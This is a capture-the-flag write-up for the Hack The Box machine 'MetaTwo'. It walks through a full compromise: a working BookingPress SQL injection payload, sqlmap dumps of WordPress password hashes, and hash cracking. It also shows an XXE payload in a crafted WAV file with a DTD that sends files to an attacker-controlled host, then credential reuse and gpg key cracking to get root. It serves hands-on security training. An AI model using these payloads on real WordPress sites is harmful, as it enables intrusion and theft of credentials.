INDEX

Enumeration
SQL Injection Explotation
Password Cracking 1
XXE
Privesc
Password Cracking 2

Metatwo box HTB

Enumeration

nmap -p- 10.10.11.186

  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 19:24 CET
  Nmap scan report for metatwo (10.10.11.186)
  Host is up (0.057s latency).
  Not shown: 65532 closed tcp ports (conn-refused)
  PORT   STATE SERVICE
  21/tcp open  ftp
  22/tcp open  ssh
  80/tcp open  http

  Nmap done: 1 IP address (1 host up) scanned in 25.52 seconds

nmap -p21 -A -sCV 10.10.11.186

  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 19:26 CET
  Nmap scan report for metatwo (10.10.11.186)
  Host is up (0.056s latency).

  PORT   STATE SERVICE VERSION
  21/tcp open  ftp
  | fingerprint-strings: 
  |   GenericLines: 
  |     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
  |     Invalid command: try being more creative
  |_    Invalid command: try being more creative
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port21-TCP:V=7.92%I=7%D=11/28%Time=6384FD46%P=x86_64-pc-linux-gnu%r(Gen
  SF:ericLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10
  SF:\.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cr
  SF:eative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creativ
  SF:e\r\n");

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 68.95 seconds

There don’t seem to be any known vulnerabilities

I try to connect: ftp 10.10.11.186

  Connected to 10.10.11.186.
  220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
  Name (10.10.11.186:chry): anonymous
  331 Password required for anonymous
  Password: 
  530 Login incorrect.
  ftp: Login failed
  ftp> 
  ftp> exit
  221 Goodbye.

The anonymous login seems not working

After finding nothing in the FTP service I look at the website content

nmap -p80 -A -sCV 10.10.11.186

  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 19:33 CET
  Nmap scan report for metatwo (10.10.11.186)
  Host is up (0.053s latency).

  PORT   STATE SERVICE VERSION
  80/tcp open  http    nginx 1.18.0
  |_http-server-header: nginx/1.18.0
  |_http-title: Did not follow redirect to http://metapress.htb/

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 8.42 seconds

I need to follow the redirect to http://metapress.htb/ but first I must add it to /etc/hosts file

I notice that the web server is nginx 1.18.0

Website content:

  Welcome on board!
  This site will be launched soon.
  In the meanwhile you can signup to our launch event.

  Be sure to do it from here:
  http://metapress.htb/events/

nmap -p80 -A -sCV metapress.htb

  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 19:34 CET
  Nmap scan report for metapress.htb (10.10.11.186)
  Host is up (0.053s latency).
  rDNS record for 10.10.11.186: metatwo

  PORT   STATE SERVICE VERSION
  80/tcp open  http    nginx 1.18.0
  | http-cookie-flags: 
  |   /: 
  |     PHPSESSID: 
  |_      httponly flag not set
  | http-robots.txt: 1 disallowed entry 
  |_/wp-admin/
  |_http-trane-info: Problem with XML parsing of /evox/about
  |_http-server-header: nginx/1.18.0
  |_http-generator: WordPress 5.6.2
  |_http-title: MetaPress &#8211; Official company site

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

WordPress 5.6.2 is the CMS present on the site

I scan the wordpress installation with:

wpscan --url http://metapress.htb/ --random-user-agent --enumerate vp --plugins-detection aggressive --api-token <i cannot show it man>

  [i] Plugin(s) Identified:

  [+] bookingpress-appointment-booking
  | Location: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/
  | Last Updated: 2022-11-21T13:57:00.000Z
  | Readme: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
  | [!] The version is out of date, the latest version is 1.0.48
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: BookingPress < 1.0.11 - Unauthenticated SQL Injection
  |     Fixed in: 1.0.11
  |     References:
  |      - https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0739
  |      - https://plugins.trac.wordpress.org/changeset/2684789
  |
  | Version: 1.0.10 (100% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
  | Confirmed By: Translation File (Aggressive Detection)
  |  - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/languages/bookingpress-appointment-booking-en_US.po, Match: 'sion: BookingPress Appointment Booking v1.0.10'

  [+] WPScan DB API OK
  | Plan: free
  | Requests Done (during the scan): 3
  | Requests Remaining: 72

  [+] Finished: Mon Nov 28 19:41:11 2022
  [+] Requests Done: 5042
  [+] Cached Requests: 9
  [+] Data Sent: 1.561 MB
  [+] Data Received: 21.308 MB
  [+] Memory used: 217.125 MB
  [+] Elapsed time: 00:02:06

Looking at the vulnerability I notice that I can run the following command:

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=8cc8b79544&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

But unfortunately, it will return the following error in the output
```
  {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}
```
On http://metapress.htb/events I found, in the source code, the wpnonce value:
```
  var postData = { action:'bookingpress_before_book_appointment', appointment_data: vm.appointment_step_form_data,_wpnonce:'8c57e8f795' };
```
This will allow me to bypass the security check and perform the SQLI attack

SQL Injection Exploitation

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=8c57e8f795&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

  [
      {
          "bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1",
          "bookingpress_category_id":"Debian 11",
          "bookingpress_service_name":"debian-linux-gnu",
          "bookingpress_service_price":"$1.00",
          "bookingpress_service_duration_val":"2",
          "bookingpress_service_duration_unit":"3",
          "bookingpress_service_description":"4",
          "bookingpress_service_position":"5",
          "bookingpress_servicedate_created":"6",
          "service_price_without_currency":1,
          "img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"
      }
  ]

I note that the DBMS is MariaDB 10.5.15 and the operating system Debian 11

I start the effective enumeration with SQLMap

First of all I have to retrieve an HTTP request to be used by the tool. To do that I just need to run the previous curl command with the --proxy http://127.0.0.1:8080 parameter and listen the request with BurpSuite proxy

On the request I also have to remove all the possible query traces, because it will be automatically made by the tool

  POST /wp-admin/admin-ajax.php HTTP/1.1
  Host: metapress.htb
  User-Agent: curl/7.84.0
  Accept: */*
  Content-Length: 185
  Content-Type: application/x-www-form-urlencoded
  Connection: close

  action=bookingpress_front_get_category_services&_wpnonce=8c57e8f795&category_id=33&total_service=0

Ok, I save it in a txt file and I can start

First of all I see which databases are there: sqlmap -r request.txt --batch --dbs

  available databases [2]:
  [*] blog
  [*] information_schema

Now I check all the tables present in the blog database: sqlmap -r request.txt --batch -D blog --tables

  [27 tables]
  +--------------------------------------+
  | wp_bookingpress_appointment_bookings |
  | wp_bookingpress_categories           |
  | wp_bookingpress_customers            |
  | wp_bookingpress_customers_meta       |
  | wp_bookingpress_customize_settings   |
  | wp_bookingpress_debug_payment_log    |
  | wp_bookingpress_default_daysoff      |
  | wp_bookingpress_default_workhours    |
  | wp_bookingpress_entries              |
  | wp_bookingpress_form_fields          |
  | wp_bookingpress_notifications        |
  | wp_bookingpress_payment_logs         |
  | wp_bookingpress_services             |
  | wp_bookingpress_servicesmeta         |
  | wp_bookingpress_settings             |
  | wp_commentmeta                       |
  | wp_comments                          |
  | wp_links                             |
  | wp_options                           |
  | wp_postmeta                          |
  | wp_posts                             |
  | wp_term_relationships                |
  | wp_term_taxonomy                     |
  | wp_termmeta                          |
  | wp_terms                             |
  | wp_usermeta                          |
  | wp_users                             |
  +--------------------------------------+

Now I enumerate the wp_users columns: sqlmap -r request.txt --batch -D blog -T wp_users --columns

  [10 columns]
  +---------------------+---------------------+
  | Column              | Type                |
  +---------------------+---------------------+
  | display_name        | varchar(250)        |
  | ID                  | bigint(20) unsigned |
  | user_activation_key | varchar(255)        |
  | user_email          | varchar(100)        |
  | user_login          | varchar(60)         |
  | user_nicename       | varchar(50)         |
  | user_pass           | varchar(255)        |
  | user_registered     | datetime            |
  | user_status         | int(11)             |
  | user_url            | varchar(100)        |
  +---------------------+---------------------+

Now I retrieve the user_pass and user_login columns of all the rows present: sqlmap -r request.txt --batch -D blog -T wp_users -C user_pass, user_login --dump

  [2 entries]
  +--------------+------------------------------------+
  | display_name | user_pass                          |
  +--------------+------------------------------------+
  | manager      | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 |
  | admin        | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. |
  +--------------+------------------------------------+

Password Cracking 1

hashid '$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.'

  [+] Wordpress ≥ v2.6.2 
  [+] Joomla ≥ v2.5.18 
  [+] PHPass' Portable Hash

Now I check which Hash-Mode it matches: hashcat --example-hashes

  400 phpass, WordPress (MD5), Joomla (MD5)
  Example: $P$984478476IagS59wHZvyQMArzfx58u.

I crack it then: hashcat -m 400 hashes.txt /usr/share/wordlists/rockyou.txt

  $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar     
                                                            
  Session..........: hashcat
  Status...........: Cracked
  Hash.Mode........: 400 (phpass)
  Hash.Target......: $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
  Time.Started.....: Thu Dec  1 10:26:38 2022 (1 min, 20 secs)
  Time.Estimated...: Thu Dec  1 10:27:58 2022 (0 secs)
  Kernel.Feature...: Pure Kernel
  Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
  Guess.Queue......: 1/1 (100.00%)
  Speed.#1.........:     1389 H/s (11.44ms) @ Accel:256 Loops:128 Thr:1 Vec:8
  Recovered........: 1/1 (100.00%) Digests
  Progress.........: 110592/14344385 (0.77%)
  Rejected.........: 0/110592 (0.00%)
  Restore.Point....: 109568/14344385 (0.76%)
  Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8064-8192
  Candidate.Engine.: Device Generator
  Candidates.#1....: taena -> music69
  Hardware.Mon.#1..: Util: 90%

  Started: Thu Dec  1 10:26:35 2022
  Stopped: Thu Dec  1 10:28:00 2022

Now I can use this password to log-in in the WordPress admin panel as manager user

XXE

After logged in the pannel I start to search if there is any note vulnerability as authenticated user for WordPress 5.6.2

I found this https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/

First of all I have to create two files for the exploitation

payload.wav

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.6:4321/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

evil.dtd

  <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
  <!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.6:4321/?p=%file;'>">

Now I have to open a php server to receive the result of the XXE as a GET response: php -S 0.0.0.0:4321

Perfect, now I upload the payload.wav file to the site at the following url: http://metapress.htb/wp-admin/upload.php

I decode the answer in base64

  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
  systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
  messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
  sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
  jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
  systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
  systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
  mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
  proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
  ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin

I particularly notice the user jnelson, so I try to get his private key (/home/jnelson/.ssh/id_rsa) to enter the box with ssh

Unfortunately the file seems to be inexistent (I do not receive any GET response encoded in base64)

I look at its config files to derive the WordPress root path

/etc/nginx/sites-enabled/default

  server {
      listen 80;
      listen [::]:80;

      root /var/www/metapress.htb/blog;

      index index.php index.html;

      if ($http_host != "metapress.htb") {
              rewrite ^ http://metapress.htb/;
      }

      location / {
              try_files $uri $uri/ /index.php?$args;
      }
    
      location ~ \.php$ {
              include snippets/fastcgi-php.conf;
              fastcgi_pass unix:/var/run/php/php8.0-fpm.sock;
      }

      location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ {
              expires max;
              log_not_found off;
      }
  }

I can find the root path of the website

Now I just have to look at the juiciest WordPress configuration file

/var/www/metapress.htb/blog/wp-config.php

  <?php
  /** The name of the database for WordPress */
  define( 'DB_NAME', 'blog' );

  /** MySQL database username */
  define( 'DB_USER', 'blog' );

  /** MySQL database password */
  define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

  /** MySQL hostname */
  define( 'DB_HOST', 'localhost' );

  /** Database Charset to use in creating database tables. */
  define( 'DB_CHARSET', 'utf8mb4' );

  /** The Database Collate type. Don't change this if in doubt. */
  define( 'DB_COLLATE', '' );

  define( 'FS_METHOD', 'ftpext' );
  define( 'FTP_USER', 'metapress.htb' );
  define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
  define( 'FTP_HOST', 'ftp.metapress.htb' );
  define( 'FTP_BASE', 'blog/' );
  define( 'FTP_SSL', false );

I try the FTP credentials on the machine and bingo!

Now that I can see the contents of the FTP server, I download all the files present with the command: wget -r --user="metapress.htb" --password="9NYS_ii@FyL_p5M2NvJ" ftp://ftp.metapress.htb/

In the blog folder there seems to be exactly the website I have already seen

In the mailer folder there is the PHPMailer plugin and the send_email.php file

  <?php
  /*
  * This script will be used to send an email to all our users when ready for launch
  */

  use PHPMailer\PHPMailer\PHPMailer;
  use PHPMailer\PHPMailer\SMTP;
  use PHPMailer\PHPMailer\Exception;

  require 'PHPMailer/src/Exception.php';
  require 'PHPMailer/src/PHPMailer.php';
  require 'PHPMailer/src/SMTP.php';

  $mail = new PHPMailer(true);

  $mail->SMTPDebug = 3;                               
  $mail->isSMTP();            

  $mail->Host = "mail.metapress.htb";
  $mail->SMTPAuth = true;                          
  $mail->Username = "jnelson@metapress.htb";                 
  $mail->Password = "Cb4_JmWM8zUZWMu@Ys";                           
  $mail->SMTPSecure = "tls";                           
  $mail->Port = 587;                                   

  $mail->From = "jnelson@metapress.htb";
  $mail->FromName = "James Nelson";

  $mail->addAddress("info@metapress.htb");

  $mail->isHTML(true);

  $mail->Subject = "Startup";
  $mail->Body = "<i>We just started our new blog metapress.htb!</i>";

  try {
      $mail->send();
      echo "Message has been sent successfully";
  } catch (Exception $e) {
      echo "Mailer Error: " . $mail->ErrorInfo;
  }

I got the credentials for jnelson

Privesc

I use linpeas.sh and find this weird folder /home/jnelson/.passpie/ssh

root.pass

  comment: ''
  fullname: root@ssh
  login: root
  modified: 2022-06-26 08:58:15.621572
  name: ssh
  password: '-----BEGIN PGP MESSAGE-----

  hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2

  nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km

  yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED

  /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf

  iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg

  krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw

  mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr

  lpF0RatbxQGWBks5F3o=

  =uh1B

  -----END PGP MESSAGE-----

  '

jnelson.pass

  comment: ''
  fullname: jnelson@ssh
  login: jnelson
  modified: 2022-06-26 08:58:15.514422
  name: ssh
  password: '-----BEGIN PGP MESSAGE-----

  hQEOA6I+wl+LXYMaEAP/eA8Bw+/AcAvm5g0QFotFRzmToYPSoUr13XcUSSmuEi0c

  4zObpYX4PvSjB6YdhIIxu/cJNZV+WbUuTU0HZTPs49i8qe1xK+g4YRELqhSo6oig

  ZuvQptZzB8LmG8zRVB6c1aO/1SoiRvzfGmgrdaHhtyGA2rtdTZU66MIzZ+irVhED

  /Agw0T3BdpJ15yuNSmyfpf14PeE5r/dWBc6l4/VO6ZZzWyX8SysNxcFDSHChpXsm

  7OR9hpt9HEVZiHq87qNwSYqiNeA9p7uzKV37HQpik3zQvtudc8Ho7IUdU1a5ZCWj

  EmrNsSI0aEBKbJ47ZoX4jfwnjRO5QrDzNf1G9vkbzb2V0k0BtHWiok49YVRmLB63

  GFD/CGo7s1dia+0PP6BNMo0dllqI72/8rGQcM0BFOqzhzKZ3/iNNKoJUiEHzIvMW

  7ome0qtZhiFs+5J3I2U1HA==

  =91YS

  -----END PGP MESSAGE-----

  '

/usr/local/bin/passpie it’s a software that I don’t know so I search on the Internet and find https://pypi.org/project/passpie/1.6.1/

passpie is a password manager who uses a passphrase for decrypt the credentials. The password files are encrypted using GNUPG and they are saved in yaml text file, just like the found ones!

  jnelson@meta2:~/.passpie/ssh$ which paspie
  jnelson@meta2:~/.passpie/ssh$ passpie
  ╒════════╤═════════╤════════════╤═══════════╕
  │ Name   │ Login   │ Password   │ Comment   │
  ╞════════╪═════════╪════════════╪═══════════╡
  │ ssh    │ jnelson │ ********   │           │
  ├────────┼─────────┼────────────┼───────────┤
  │ ssh    │ root    │ ********   │           │
  ╘════════╧═════════╧════════════╧═══════════╛

the key pair is saved in here: /home/jnelson/.passpie/.keys

For convenience, I save the two keys locally with the names public.key and private.key

gpg --import public.key

gpg --list-public-keys

  /home/user/.gnupg/pubring.kbx
  -----------------------------
  pub   dsa3072 2022-06-26 [SCA]
      7C6786A7561BC84F5048671E387775C35745D203
  uid           [ unknown] Passpie (Auto-generated by Passpie) <passpie@local>
  sub   elg1024 2022-06-26 [E]

Password Cracking 2

gpg --import private.key, the previous command asks me for a password that I don’t know, I then use the gpg2john tool to extract the hash of the password used by GnuPG

gpg2john private.key > gpghash.txt

  Passpie:$gpg$*17*54*3072*e975911867862609115f302a3d0196aec0c2ebf79a84c0303056df921c965e589f82d7dd71099ed9749408d5ad17a4421006d89b49c0*3*254*2*7*16*21d36a3443b38bad35df0f0e2c77f6b9*65011712*907cb55ccb37aaad:::Passpie (Auto-generated by Passpie) <passpie@local>::private.key

bruteforce attack with: john gpghash.txt

  blink182         (Passpie)

I then rerun the command gpg --import private.key by entering the password I just found

gpg --list-secret-keys

  /home/user/.gnupg/pubring.kbx
  -----------------------------
  sec   dsa3072 2022-06-26 [SCA]
      7C6786A7561BC84F5048671E387775C35745D203
  uid           [ unknown] Passpie (Auto-generated by Passpie) <passpie@local>
  ssb   elg1024 2022-06-26 [E]

Now i can decrypt the root password

root.pass.gpg

gpg --output root.pass --decrypt root.pass.gpg

in the root.pass file it is present

  p7qfAZt4_A1xo_0x

I can become root by entering the password (su root)

id

  uid=0(root) gid=0(root) groups=0(root)